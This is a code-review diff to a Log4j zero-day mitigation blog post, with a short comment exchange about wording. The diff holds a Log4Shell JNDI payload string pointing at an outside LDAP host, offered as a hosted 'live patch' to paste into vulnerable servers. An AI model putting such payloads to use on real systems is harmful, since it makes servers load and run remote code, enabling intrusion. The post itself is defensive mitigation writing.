docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx

```diff
@@ -306,12 +306,19 @@ Because of the extensive control Log4Shell gives an attacker, it's actually poss
 This isn't the recommended strategy for various reasons, but it could be a last resort for systems that you can't easily restart or modify.  Note that doing this on a system 
 you don't have permission to is most likely illegal. The fix will only work until the server (or the JVM) is restarted.
 
-You use our hosted version here to patch yourself:
+We've published articles about this exploit that you can use to learn more about how it works.
+- **[Overview (When to use it)](https://www.lunasec.io/docs/blog/log4shell-live-patch/)**,
+- **[Technical Deep-dive](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical)**
+
+#### Hosted Exploit Payload
+
 ```
 ${jndi:ldap://patch.log4shell.com:1389/a}
 ```
 
-Just simply paste that anywhere into your server where you're vulnerable, and it will work. (For example, in the `main` function when you start up your server)
+Just simply paste that anywhere into your server where you're vulnerable, and it will patch you against future
+exploitation. (For example, in the `main` function when you start up your server, or a known vulnerable field if it's
```

Comment:
patch the server against exploitation until it restarts.

Reply:
Just simply paste that anywhere into your server where it's vulnerable, and it will be patched against exploitation until it restarts.